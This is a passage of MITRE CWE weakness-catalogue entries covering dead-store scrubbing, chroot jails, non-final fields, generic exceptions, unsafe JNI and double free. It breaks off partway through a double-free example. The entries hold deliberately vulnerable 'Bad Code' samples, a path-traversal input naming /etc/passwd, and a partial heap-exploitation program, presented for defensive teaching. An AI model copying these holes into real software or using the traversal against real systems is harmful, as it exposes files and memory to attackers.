Use class equivalency to determine type. Rather than use the class name to determine if an object is of a given type, use the getClass() method, and == operator.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory171Cleansing, Canonicalization, and Comparison Errors
Development Concepts699
ChildOfWeakness ClassWeakness Class485Insufficient Encapsulation
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
Research Concepts1000
ChildOfWeakness ClassWeakness Class697Insufficient Comparison
Research Concepts (primary)1000
ChildOfCategoryCategory849CERT Java Secure Coding Section 04 - Object Orientation (OBJ)
Weaknesses Addressed by the CERT Java Secure Coding Standard (primary)844
ChildOfCategoryCategory998SFP Secondary Cluster: Glitch in Computation
Software Fault Pattern (SFP) Clusters (primary)888
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
PeerOfWeakness BaseWeakness Base386Symbolic Name not Mapping to Correct Object
Research Concepts1000
+ Relevant Properties
  • Equivalence
  • Uniqueness
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsComparing Classes by Name
CLASPComparing classes by name
CERT Java Secure CodingOBJ09-JCompare classes and not class names
Software Fault PatternsSFP1Glitch in computation
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Common_Consequences, Description, Relationships, Other_Notes, Relevant_Properties, Taxonomy_Mappings
2009-03-10CWE Content TeamMITREInternal
updated Other_Notes
2009-07-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Demonstrative_Examples, Relationships, Taxonomy_Mappings
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Comparing Classes by Name

CWE-14: Compiler Removal of Code to Clear Buffers

Weakness ID: 14
Abstraction: Base
Status: Draft
Presentation Filter:
+ Description

Description Summary

Sensitive memory is cleared according to the source code, but compiler optimizations leave the memory untouched when it is not read from again, aka "dead store removal."

Extended Description

This compiler optimization error occurs when:

1. Secret data are stored in memory.

2. The secret data are scrubbed from memory by overwriting its contents.

3. The source code is compiled using an optimizing compiler, which identifies and removes the function that overwrites the contents as a dead store because the memory is not used subsequently.

+ Time of Introduction
  • Implementation
  • Build and Compilation
+ Applicable Platforms

Languages

C

C++

+ Common Consequences
ScopeEffect
Confidentiality
Access Control

Technical Impact: Read memory; Bypass protection mechanism

This weakness will allow data that has not been cleared from memory to be read. If this data contains sensitive password information, then an attacker can read the password and use the information to bypass protection mechanisms.

+ Detection Methods

Black Box

This specific weakness is impossible to detect using black box methods. While an analyst could examine memory to see that it has not been scrubbed, an analysis of the executable would not be successful. This is because the compiler has already removed the relevant code. Only the source code shows whether the programmer intended to clear the memory or not, so this weakness is indistinguishable from others.

White Box

This weakness is only detectable using white box methods (see black box detection factor). Careful analysis is required to determine if the code is likely to be removed by the compiler.

+ Demonstrative Examples

Example 1

The following code reads a password from the user, uses the password to connect to a back-end mainframe and then attempts to scrub the password from memory using memset().

(Bad Code)
Example Language: C 
void GetData(char *MFAddr) {
char pwd[64];
if (GetPasswordFromUser(pwd, sizeof(pwd))) {

if (ConnectToMainframe(MFAddr, pwd)) {

// Interaction with mainframe
}
}
memset(pwd, 0, sizeof(pwd));
}

The code in the example will behave correctly if it is executed verbatim, but if the code is compiled using an optimizing compiler, such as Microsoft Visual C++ .NET or GCC 3.x, then the call to memset() will be removed as a dead store because the buffer pwd is not used after its value is overwritten [18]. Because the buffer pwd contains a sensitive value, the application may be vulnerable to attack if the data are left memory resident. If attackers are able to access the correct region of memory, they may use the recovered password to gain control of the system.

It is common practice to overwrite sensitive data manipulated in memory, such as passwords or cryptographic keys, in order to prevent attackers from learning system secrets. However, with the advent of optimizing compilers, programs do not always behave as their source code alone would suggest. In the example, the compiler interprets the call to memset() as dead code because the memory being written to is not subsequently used, despite the fact that there is clearly a security motivation for the operation to occur. The problem here is that many compilers, and in fact many programming languages, do not take this and other security concerns into consideration in their efforts to improve efficiency.

Attackers typically exploit this type of vulnerability by using a core dump or runtime mechanism to access the memory used by a particular application and recover the secret information. Once an attacker has access to the secret information, it is relatively straightforward to further exploit the system and possibly compromise other resources with which the application interacts.

+ Potential Mitigations

Phase: Implementation

Store the sensitive data in a "volatile" memory location if available.
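
A related, commonly used technique is sketched below: writing the zeros through a pointer to volatile so the stores cannot be treated as a dead store and removed. This is one conventional approach, not the only one; where available, C11's memset_s() serves the same purpose.

(Good Code)
Example Language: C 
#include <stddef.h>

/* zero a buffer through a volatile pointer so the compiler
   cannot discard the writes as a dead store */
void secure_zero(void *buf, size_t len) {
    volatile unsigned char *p = (volatile unsigned char *)buf;
    while (len--) {
        *p++ = 0;
    }
}

In the GetData() example above, calling secure_zero(pwd, sizeof(pwd)) in place of memset() is intended to keep the scrub in the compiled code.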

Phase: Build and Compilation

If possible, configure your compiler so that it does not remove dead stores.

Phase: Architecture and Design

Where possible, encrypt sensitive data that are used by a software system.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory2Environment
Seven Pernicious Kingdoms (primary)700
ChildOfCategoryCategory633Weaknesses that Affect Memory
Resource-specific Weaknesses (primary)631
ChildOfCategoryCategory729OWASP Top Ten 2004 Category A8 - Insecure Storage
Weaknesses in OWASP Top Ten (2004) (primary)711
ChildOfWeakness BaseWeakness Base733Compiler Optimization Removal or Modification of Security-critical Code
Development Concepts (primary)699
Research Concepts (primary)1000
ChildOfCategoryCategory747CERT C Secure Coding Section 49 - Miscellaneous (MSC)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfCategoryCategory883CERT C++ Secure Coding Section 49 - Miscellaneous (MSC)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory963SFP Secondary Cluster: Exposed Data
Software Fault Pattern (SFP) Clusters (primary)888
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
+ Affected Resources
  • Memory
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsInsecure Compiler Optimization
PLOVERSensitive memory uncleared by compiler optimization
OWASP Top Ten 2004A8CWE More SpecificInsecure Storage
CERT C Secure CodingMSC06-CBe aware of compiler optimization when dealing with sensitive data
CERT C++ Secure CodingMSC06-CPPBe aware of compiler optimization when dealing with sensitive data
Software Fault PatternsSFP23Exposed Data
+ References
[REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 9, "A Compiler Optimization Caveat" Page 322. 2nd Edition. Microsoft. 2002.
Michael Howard. "When scrubbing secrets in memory doesn't work". BugTraq. 2002-11-05. <http://cert.uni-stuttgart.de/archive/bugtraq/2002/11/msg00046.html>.
Michael Howard. "Some Bad News and Some Good News". Microsoft. 2002-10-21. <http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dncode/html/secure10102002.asp>.
Joseph Wagner. "GNU GCC: Optimizer Removes Code Necessary for Security". Bugtraq. 2002-11-16. <http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2002-11/0257.html>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings
2008-10-14CWE Content TeamMITREInternal
updated Relationships
2008-11-24CWE Content TeamMITREInternal
updated Applicable_Platforms, Description, Detection_Factors, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction
2009-05-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2010-02-16CWE Content TeamMITREInternal
updated References
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Common_Consequences, References, Relationships
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2017-01-19CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Insecure Compiler Optimization

CWE-243: Creation of chroot Jail Without Changing Working Directory

Weakness ID: 243
Abstraction: Variant
Status: Draft
Presentation Filter:
+ Description

Description Summary

The program uses the chroot() system call to create a jail, but does not change the working directory afterward. This does not prevent access to files outside of the jail.

Extended Description

Improper use of chroot() may allow attackers to escape from the chroot jail. The chroot() function call does not change the process's current working directory, so relative paths may still refer to file system resources outside of the chroot jail after chroot() has been called.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

C

C++

Operating Systems

UNIX

+ Common Consequences
ScopeEffect
Confidentiality

Technical Impact: Read files or directories

+ Likelihood of Exploit

High

+ Demonstrative Examples

Example 1

Consider the following source code from a (hypothetical) FTP server:

(Bad Code)
Example Language: C 
chroot("/var/ftproot");
...
fgets(filename, sizeof(filename), network);
localfile = fopen(filename, "r");
while ((len = fread(buf, 1, sizeof(buf), localfile)) != EOF) {
fwrite(buf, 1, sizeof(buf), network);
}
fclose(localfile);

This code is responsible for reading a filename from the network, opening the corresponding file on the local machine, and sending the contents over the network. This code could be used to implement the FTP GET command. The FTP server calls chroot() in its initialization routines in an attempt to prevent access to files outside of /var/ftproot. But because the server does not change the current working directory by calling chdir("/"), an attacker could request the file "../../../../../etc/passwd" and obtain a copy of the system password file.
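
The conventional correction is sketched below: call chdir("/") immediately after chroot() and check both return values, so that relative paths resolve inside the jail. The error handling shown is an illustrative assumption.

(Good Code)
Example Language: C 
#include <stdlib.h>
#include <unistd.h>

if (chroot("/var/ftproot") != 0) {
    exit(1); /* could not establish the jail */
}
if (chdir("/") != 0) {
    exit(1); /* could not move the working directory into the jail */
}
/* ... read filenames from the network and serve files as before ... */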

+ Background Details

The chroot() system call allows a process to change its perception of the root directory of the file system. After properly invoking chroot(), a process cannot access any files outside the directory tree defined by the new root directory. Such an environment is called a chroot jail and is commonly used to prevent the possibility that a process could be subverted and used to access unauthorized files. For instance, many FTP servers run in chroot jails to prevent an attacker who discovers a new vulnerability in the server from being able to download the password file or other sensitive files on the system.

+ Weakness Ordinalities
OrdinalityDescription
Resultant
(where the weakness is typically related to the presence of some other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class227Improper Fulfillment of API Contract ('API Abuse')
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ChildOfWeakness ClassWeakness Class573Improper Following of Specification by Caller
Research Concepts1000
ChildOfCategoryCategory632Weaknesses that Affect Files or Directories
Resource-specific Weaknesses (primary)631
ChildOfWeakness ClassWeakness Class669Incorrect Resource Transfer Between Spheres
Research Concepts (primary)1000
ChildOfCategoryCategory979SFP Secondary Cluster: Failed Chroot Jail
Software Fault Pattern (SFP) Clusters (primary)888
+ Affected Resources
  • File/Directory
+ Causal Nature

Explicit

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsDirectory Restriction
Software Fault PatternsSFP17Failed chroot jail
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-09-08CWE Content TeamMITREInternal
updated Applicable_Platforms, Background_Details, Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities
2008-10-14CWE Content TeamMITREInternal
updated Description
2009-03-10CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-05-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2010-12-13CWE Content TeamMITREInternal
updated Demonstrative_Examples, Name
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2012-05-11CWE Content TeamMITREInternal
updated Relationships
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-01-30Directory Restriction
2010-12-13Failure to Change Working Directory in chroot Jail

CWE-493: Critical Public Variable Without Final Modifier

Weakness ID: 493
Abstraction: Variant
Status: Draft
Presentation Filter:
+ Description

Description Summary

The product has a critical public variable that is not final, which allows the variable to be modified to contain unexpected values.

Extended Description

If a field is non-final and public, it can be changed once the value is set by any function that has access to the class which contains the field. This could lead to a vulnerability if other parts of the program make assumptions about the contents of that field.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

Java

C++

+ Common Consequences
ScopeEffect
Integrity

Technical Impact: Modify application data

The object could potentially be tampered with.

Confidentiality

Technical Impact: Read application data

The object's data could potentially be read by any code with access to it.

+ Likelihood of Exploit

High

+ Demonstrative Examples

Example 1

Suppose this WidgetData class is used for an e-commerce web site. The programmer attempts to prevent price-tampering attacks by setting the price of the widget using the constructor.

(Bad Code)
Example Language: Java 
public final class WidgetData extends Applet {
public float price;
...
public WidgetData(...) {
this.price = LookupPrice("MyWidgetType");
}
}

The price field is not final. Even though the value is set by the constructor, it could be modified by anybody that has access to an instance of WidgetData.

Example 2

Assume the following code is intended to provide the location of a configuration file that controls execution of the application.

(Bad Code)
Example Language: C++ 
public string configPath = "/etc/application/config.dat";
(Bad Code)
Example Language: Java 
public String configPath = new String("/etc/application/config.dat");

While this field is readable from any function, and thus might allow an information leak of a pathname, a more serious problem is that it can be changed by any function.

+ Potential Mitigations

Phase: Implementation

Declare all public fields as final when possible, especially if they are used to maintain the internal state of an Applet or of classes used by an Applet. If a field must be public, then perform all appropriate sanity checks before accessing it from your code.

+ Background Details

Mobile code, such as a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects' state and behavior by adversaries who have access to the same virtual machine where your program is running.

The final modifier provides security by preventing a value from being changed after it is set. Note, however, that a class can be declared final only if it is not meant to be extended.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class216Containment Errors (Container Errors)
Research Concepts1000
ChildOfWeakness ClassWeakness Class485Insufficient Encapsulation
Seven Pernicious Kingdoms (primary)700
ChildOfCategoryCategory490Mobile Code Issues
Development Concepts (primary)699
ChildOfWeakness ClassWeakness Class668Exposure of Resource to Wrong Sphere
Research Concepts (primary)1000
ChildOfCategoryCategory849CERT Java Secure Coding Section 04 - Object Orientation (OBJ)
Weaknesses Addressed by the CERT Java Secure Coding Standard (primary)844
ChildOfCategoryCategory1002SFP Secondary Cluster: Unexpected Entry Points
Software Fault Pattern (SFP) Clusters (primary)888
ParentOfWeakness VariantWeakness Variant500Public Static Field Not Marked Final
Development Concepts (primary)699
Research Concepts (primary)1000
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsMobile Code: Non-Final Public Field
CLASPFailure to provide confidentiality for stored data
CERT Java Secure CodingOBJ10-JDo not use public static nonfinal variables
Software Fault PatternsSFP28Unexpected access points
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Description, Likelihood_of_Exploit, Relationships, Other_Notes, Taxonomy_Mappings
2008-11-24CWE Content TeamMITREInternal
updated Background_Details, Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations
2009-05-27CWE Content TeamMITREInternal
updated Background_Details, Demonstrative_Examples, Description, Relationships
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Mobile Code: Non-final Public Field

CWE-396: Declaration of Catch for Generic Exception

Weakness ID: 396
Abstraction: Base
Status: Draft
Presentation Filter:
+ Description

Description Summary

Catching overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities.

Extended Description

Multiple catch blocks can get ugly and repetitive, but "condensing" catch blocks by catching a high-level class like Exception can obscure exceptions that deserve special treatment or that should not be caught at this point in the program. Catching an overly broad exception essentially defeats the purpose of Java's typed exceptions, and can become particularly dangerous if the program grows and begins to throw new types of exceptions. The new exception types will not receive any attention.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

C++

Java

.NET

+ Common Consequences
ScopeEffect
Non-Repudiation
Other

Technical Impact: Hide activities; Alter execution logic

+ Demonstrative Examples

Example 1

The following code excerpt handles three types of exceptions in an identical fashion.

(Good Code)
Example Language: Java 
try {
doExchange();
}
catch (IOException e) {
logger.error("doExchange failed", e);
}
catch (InvocationTargetException e) {

logger.error("doExchange failed", e);
}
catch (SQLException e) {

logger.error("doExchange failed", e);
}

At first blush, it may seem preferable to deal with these exceptions in a single catch block, as follows:

(Bad Code)
 
try {
doExchange();
}
catch (Exception e) {
logger.error("doExchange failed", e);
}

However, if doExchange() is modified to throw a new type of exception that should be handled in some different kind of way, the broad catch block will prevent the compiler from pointing out the situation. Further, the new catch block will now also handle exceptions derived from RuntimeException, such as ClassCastException and NullPointerException, which is not the programmer's intent.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class221Information Loss or Omission
Research Concepts1000
ChildOfCategoryCategory388Error Handling
Seven Pernicious Kingdoms (primary)700
ChildOfCategoryCategory389Error Conditions, Return Values, Status Codes
Development Concepts (primary)699
ChildOfWeakness ClassWeakness Class705Incorrect Control Flow Scoping
Research Concepts (primary)1000
ChildOfWeakness ClassWeakness Class755Improper Handling of Exceptional Conditions
Research Concepts1000
ChildOfCategoryCategory960SFP Secondary Cluster: Ambiguous Exception Type
Software Fault Pattern (SFP) Clusters (primary)888
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsOverly-Broad Catch Block
Software Fault PatternsSFP5Ambiguous Exception Type
+ References
[REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 9: Catching Exceptions." Page 157. McGraw-Hill. 2010.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings
2008-09-24CWE Content TeamMITREInternal
Removed C from Applicable_Platforms
2008-10-14CWE Content TeamMITREInternal
updated Applicable_Platforms
2009-03-10CWE Content TeamMITREInternal
updated Relationships
2009-05-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-10-29CWE Content TeamMITREInternal
updated Description, Other_Notes
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2012-05-11CWE Content TeamMITREInternal
updated References, Relationships
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Overly-Broad Catch Block

CWE-397: Declaration of Throws for Generic Exception

Weakness ID: 397
Abstraction: Base
Status: Draft
Presentation Filter:
+ Description

Description Summary

Throwing overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities.

Extended Description

Declaring a method to throw Exception or Throwable makes it difficult for callers to perform proper error handling and error recovery. Java's exception mechanism, for example, is set up to make it easy for callers to anticipate what can go wrong and write code to handle each specific exceptional circumstance. Declaring that a method throws a generic form of exception defeats this system.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

C++

Java

.NET

+ Common Consequences
ScopeEffect
Non-Repudiation
Other

Technical Impact: Hide activities; Alter execution logic

+ Demonstrative Examples

Example 1

The following method throws three types of exceptions.

(Good Code)
Example Language: Java 
public void doExchange() throws IOException, InvocationTargetException, SQLException {
...
}

While it might seem tidier to write

(Bad Code)
 
public void doExchange() throws Exception {
...
}

doing so hampers the caller's ability to understand and handle the exceptions that occur. Further, if a later revision of doExchange() introduces a new type of exception that should be treated differently than previous exceptions, there is no easy way to enforce this requirement.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class221Information Loss or Omission
Research Concepts1000
ChildOfCategoryCategory388Error Handling
Seven Pernicious Kingdoms (primary)700
ChildOfCategoryCategory389Error Conditions, Return Values, Status Codes
Development Concepts (primary)699
ChildOfWeakness ClassWeakness Class703Improper Check or Handling of Exceptional Conditions
Research Concepts1000
ChildOfWeakness ClassWeakness Class705Incorrect Control Flow Scoping
Research Concepts (primary)1000
ChildOfCategoryCategory851CERT Java Secure Coding Section 06 - Exceptional Behavior (ERR)
Weaknesses Addressed by the CERT Java Secure Coding Standard (primary)844
ChildOfCategoryCategory960SFP Secondary Cluster: Ambiguous Exception Type
Software Fault Pattern (SFP) Clusters (primary)888
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsOverly-Broad Throws Declaration
CERT Java Secure CodingERR07-JDo not throw RuntimeException, Exception, or Throwable
Software Fault PatternsSFP5Ambiguous Exception Type
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings
2008-09-24CWE Content TeamMITREInternal
Removed C from Applicable_Platforms
2008-10-14CWE Content TeamMITREInternal
updated Applicable_Platforms
2009-03-10CWE Content TeamMITREInternal
updated Relationships
2009-05-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-10-29CWE Content TeamMITREInternal
updated Description, Other_Notes
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Relationships
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Overly-Broad Throws Declaration

CWE-111: Direct Use of Unsafe JNI

Weakness ID: 111
Abstraction: Base
Status: Draft
Presentation Filter:
+ Description

Description Summary

When a Java application uses the Java Native Interface (JNI) to call code written in another programming language, it can expose the application to weaknesses in that code, even if those weaknesses cannot occur in Java.

Extended Description

Many safety features that programmers may take for granted simply do not apply to native code, so you must carefully review all such code for potential problems. The languages used to implement native code may be more susceptible to buffer overflows and other attacks. Native code is unprotected by the security features enforced by the runtime environment, such as strong typing and array bounds checking.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

Java

+ Common Consequences
ScopeEffect
Access Control

Technical Impact: Bypass protection mechanism

+ Demonstrative Examples

Example 1

The following Java code defines a class named Echo. The class declares one native method, which uses C to echo commands entered on the console back to the user. The C code that follows the Java listing defines the native method implemented in the Echo class:

(Bad Code)
Example Language: Java 
class Echo {

public native void runEcho();
static {

System.loadLibrary("echo");
}
public static void main(String[] args) {

new Echo().runEcho();
}
}
(Bad Code)
Example Language: C 
#include <jni.h>
#include "Echo.h"//the java class above compiled with javah
#include <stdio.h>

JNIEXPORT void JNICALL
Java_Echo_runEcho(JNIEnv *env, jobject obj)
{
char buf[64];
gets(buf);
printf(buf);
}

Because the example is implemented in Java, it may appear that it is immune to memory issues like buffer overflow vulnerabilities. Although Java does do a good job of making memory operations safe, this protection does not extend to vulnerabilities occurring in source code written in other languages that are accessed using the Java Native Interface. Despite the memory protections offered in Java, the C code in this example is vulnerable to a buffer overflow because it makes use of gets(), which does not check the length of its input.
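
A sketch of a safer native implementation is shown below: fgets() bounds the read to the buffer size, and the input is printed as data rather than as a format string (the latter addresses a separate weakness that happens to sit on the same line).

(Good Code)
Example Language: C 
#include <jni.h>
#include "Echo.h" //the java class above compiled with javah
#include <stdio.h>

JNIEXPORT void JNICALL
Java_Echo_runEcho(JNIEnv *env, jobject obj)
{
    char buf[64];
    /* fgets() never writes more than sizeof(buf) bytes, including the terminator */
    if (fgets(buf, sizeof(buf), stdin) != NULL) {
        printf("%s", buf);
    }
}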

The Sun Java(TM) Tutorial provides the following description of JNI [See Reference]: The JNI framework lets your native method utilize Java objects in the same way that Java code uses these objects. A native method can create Java objects, including arrays and strings, and then inspect and use these objects to perform its tasks. A native method can also inspect and use objects created by Java application code. A native method can even update Java objects that it created or that were passed to it, and these updated objects are available to the Java application. Thus, both the native language side and the Java side of an application can create, update, and access Java objects and then share these objects between them.

The vulnerability in the example above could easily be detected through a source code audit of the native method implementation. This may not be practical or possible depending on the availability of the C source code and the way the project is built, but in many cases it may suffice. However, the ability to share objects between Java and native methods expands the potential risk to much more insidious cases where improper data handling in Java may lead to unexpected vulnerabilities in native code, or where unsafe operations in native code corrupt data structures in Java. Vulnerabilities in native code accessed through a Java application are typically exploited in the same manner as they are in applications written in the native language. The only challenge to such an attack is for the attacker to identify that the Java application uses native code to perform certain operations. This can be accomplished in a variety of ways, including identifying specific behaviors that are often implemented with native code or by exploiting a system information exposure in the Java application that reveals its use of JNI [See Reference].

+ Potential Mitigations

Phase: Implementation

Implement error handling around the JNI call.

Phases: Architecture and Design; Implementation

Strategy: Refactoring

Do not use JNI calls if you don't trust the native library.

Phases: Architecture and Design; Implementation

Strategy: Refactoring

Be reluctant to use JNI calls. A Java API equivalent may exist.

+ Weakness Ordinalities
OrdinalityDescription
Primary
(where the weakness exists independent of other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class20Improper Input Validation
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ChildOfWeakness BaseWeakness Base695Use of Low-Level Functionality
Research Concepts (primary)1000
ChildOfCategoryCategory859CERT Java Secure Coding Section 14 - Platform Security (SEC)
Weaknesses Addressed by the CERT Java Secure Coding Standard (primary)844
ChildOfCategoryCategory1001SFP Secondary Cluster: Use of an Improper API
Software Fault Pattern (SFP) Clusters (primary)888
+ Causal Nature

Explicit

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsUnsafe JNI
CERT Java Secure CodingSEC08-JDefine wrappers around native methods
Software Fault PatternsSFP3Use of an improper API
+ References
Fortify Software. "Fortify Descriptions". <http://vulncat.fortifysoftware.com>.
B. Stearns. "The Java(TM) Tutorial: The Java Native Interface". Sun Microsystems. 2005. <http://java.sun.com/docs/books/tutorial/native1.1/>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, References, Taxonomy_Mappings, Weakness_Ordinalities
2008-11-24CWE Content TeamMITREInternal
updated Description, Other_Notes
2009-10-29CWE Content TeamMITREInternal
updated Description, Other_Notes
2011-03-29CWE Content TeamMITREInternal
updated Demonstrative_Examples
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2013-02-21CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Unsafe JNI

CWE-415: Double Free

Weakness ID: 415
Abstraction: Variant
Status: Draft
Presentation Filter:
+ Description

Description Summary

The product calls free() twice on the same memory address, potentially leading to modification of unexpected memory locations.

Extended Description

When a program calls free() twice with the same argument, the program's memory management data structures become corrupted. This corruption can cause the program to crash or, in some circumstances, cause two later calls to malloc() to return the same pointer. If malloc() returns the same value twice and the program later gives the attacker control over the data that is written into this doubly-allocated memory, the program becomes vulnerable to a buffer overflow attack.

+ Alternate Terms
Double-free
+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

C

C++

+ Common Consequences
ScopeEffect
Integrity
Confidentiality
Availability

Technical Impact: Execute unauthorized code or commands

Doubly freeing memory may result in a write-what-where condition, allowing an attacker to execute arbitrary code.

+ Likelihood of Exploit

Low to Medium

+ Demonstrative Examples

Example 1

The following code shows a simple example of a double free vulnerability.

(Bad Code)
Example Language: C 
char* ptr = (char*)malloc (SIZE);
...
if (abrt) {
free(ptr);
}
...
free(ptr);

Double free vulnerabilities have two common (and sometimes overlapping) causes:

  • Error conditions and other exceptional circumstances

  • Confusion over which part of the program is responsible for freeing the memory

Although some double free vulnerabilities are not much more complicated than the previous example, most are spread out across hundreds of lines of code or even different files. Programmers seem particularly susceptible to freeing global variables more than once.

Example 2

While contrived, this code should be exploitable on Linux distributions that do not ship with heap-chunk checksumming turned on.

(Bad Code)
Example Language: C 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFSIZE1 512
#define BUFSIZE2 ((BUFSIZE1/2) - 8)

int main(int argc, char **argv) {
    char *buf1R1;
    char *buf2R1;
    char *buf1R2;

    if (argc < 2) {
        return 1;
    }
    buf1R1 = (char *) malloc(BUFSIZE2);
    buf2R1 = (char *) malloc(BUFSIZE2);
    free(buf1R1);
    free(buf2R1);
    buf1R2 = (char *) malloc(BUFSIZE1);
    strncpy(buf1R2, argv[1], BUFSIZE1-1);
